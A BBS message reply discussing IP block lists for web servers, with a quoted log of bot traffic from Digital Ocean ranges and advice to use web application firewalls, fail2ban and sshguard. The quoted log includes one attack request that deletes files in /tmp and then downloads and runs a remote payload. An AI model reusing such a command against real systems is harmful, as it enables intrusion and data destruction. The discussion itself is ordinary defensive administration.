Subj : IP Block Lists
To   : Warpslide
From : hyjinx
Date : Sat Mar 19 2022 22:22:41

 Wa> Not wanting to block those countries out entirely I decided to dig a littl
 Wa> deeper and noticed that many of these addresses had one thing in common:
 Wa> They're coming from Digital Ocean.
 Wa> 
 Wa> Most of these seem to be trying to log into wordpress or bring up other lo
 Wa> pages for other services that don't exist on this web server.  Others seem
 Wa> be a little more insidious:
 Wa> 
 Wa> "GET /shell?cd+/tmp;rm+-rf+*;wget+31.210.xx.xxx/jaws;sh+/tmp/jaws HTTP/1.1
 Wa> 
 Wa> None of these work or do anything on my webserver, but I still don't want 
 Wa> hammering on my system.
 Wa> Fortunately Digital Ocean publishes a full list of the IP addresses they u
 Wa> https://digitalocean.com/geo/google.csv
 Wa> 
 Wa> After adding these ranges to my blocklist suddenly my apache logs are a lo
 Wa> quieter.
 Wa> 
 Wa> Do you filter by country/region or by provider?  If so, which IP ranges do
 Wa> you block?
 Wa> 

Nice - thanks for the list Warp! 

Tbh I don't block HTTP access at all really, because it's inevitable that the
bots will move from place to place eventually and it's just a constant game
of whack-a-mole. Rather, I use Web Application Firewalls for webservers and
things like fail2ban or sshguard for SSH which automatically
blacklists/greylists abusers.

Chur,
Al


hyjinx // Alistair Ross
Author of 'Back to the BBS' Documentary: https://bit.ly/3tRINeL (YouTube)
alsgeeklab.com

--- Mystic BBS v1.12 A46 2020/08/26 (Linux/64)
 * Origin: bbs.alsgeeklab.com:2323 (1337:2/104)

.